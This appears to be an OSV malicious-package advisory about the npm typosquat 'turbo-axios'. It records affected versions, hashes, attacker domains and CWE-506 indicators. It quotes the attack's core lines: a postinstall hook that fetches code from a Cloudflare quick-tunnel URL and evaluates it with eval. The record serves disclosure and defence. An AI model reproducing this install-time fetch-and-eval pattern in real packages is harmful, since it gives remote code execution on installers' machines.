{"id":"MAL-2026-4695","summary":"Malicious code in turbo-axios (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (62503451ade68043379968f3dc4784fdb66424d55422854514e3ba1b10058324)\nturbo-axios is a typosquat of the popular axios HTTP client (it re-exports the full axios API and reuses axios's repository/homepage metadata in package.json) carrying an install-time remote code execution payload. package.json declares `\"postinstall\": \"node./lib/core/eval.js\"`. lib/core/eval.js performs `fetch('https://consequences-faces-weblogs-clinical.trycloudflare.com/download/datab1')` and then `await eval(`(async () =\u003e {\\n${datab2}\\n})();`)`, executing the response body as JavaScript inside an async IIFE. The destination is an anonymous, mutable Cloudflare quick-tunnel — not the publisher's infrastructure — and the fetched bytes are not pinned, hashed, or otherwise verified, so the attacker can ship arbitrary code to every installer at any time. The exfil/RCE function is misleadingly named `sendAnalytics`. Any `npm install turbo-axios` results in attacker-controlled code execution on the installer's machine with the privileges of the npm process.\n","modified":"2026-05-26T06:02:59.475877603Z","published":"2026-05-23T15:53:39Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","modified_time":"2026-05-23T15:53:39Z","versions":["1.17.2"],"id":"IN-MAL-2026-004349","import_time":"2026-05-26T05:52:25.548235993Z","sha256":"62503451ade68043379968f3dc4784fdb66424d55422854514e3ba1b10058324"},{"source":"amazon-inspector","modified_time":"2026-05-23T16:19:11Z","id":"IN-MAL-2026-004362","versions":["1.17.3"],"import_time":"2026-05-26T05:52:27.098050827Z","sha256":"9d7a284fd6c939193711d8b2892a48375e0d0d1e75022dd2c33799a0df3dd4c8"},{"source":"amazon-inspector","modified_time":"2026-05-23T15:53:40Z","versions":["1.17.2"],"id":"IN-MAL-2026-004350","import_time":"2026-05-26T05:52:25.678412603Z","sha256":"e2a0231d72ca5ebe4597aab01d0bae4a95762789e9be835b563639acea93ceb5"},{"source":"amazon-inspector","modified_time":"2026-05-23T16:14:27Z","id":"IN-MAL-2026-004360","versions":["1.17.3"],"import_time":"2026-05-26T05:52:26.893283628Z","sha256":"f6942a85f7291a7da9e7f27d5502a81308758330fddb9b9e2ad6299a0404bb15"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/turbo-axios/v/1.17.2"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/turbo-axios/v/1.17.3"}],"affected":[{"package":{"name":"turbo-axios","ecosystem":"npm","purl":"pkg:npm/turbo-axios"},"versions":["1.17.2","1.17.3"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/turbo-axios/MAL-2026-4695.json","indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-LluR+Xr/hcuvo6stjwKCseXKUFx6zqfwbHwMMU6DiWbshT6GqyHU0id1Cl++2P7Tv/ugi3TJewlNFOwOO1tRNQ==","sha1":"98b0b5dc911586a4a736c0145157748f2707c4a9"},"filename":"turbo-axios-1.17.2.tgz"}],"domains":["philosophy-moms-incoming-milton.trycloudflare.com"],"evidence_files":[{"path":"lib/core/eval.js","tlsh":"c401d2991abb29235b3992d49e1b140bf3a17a031680e3c9f78883994fb9940c5428ee","sha256":"584dccb79cebc15dc680287617ce7534b6b9860a4b956c0bf5398145c6e08d0d"},{"path":"package.json","tlsh":"ccd1ec73c9ca4d572fb47aa8a87a9264f231c30fa551c90fb17e024c4f7572f129762a","sha256":"cf0961ab23bb2e46e5aea0da5b3f7d6195c76d7f401d1f4f9e7775568eb16b39"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}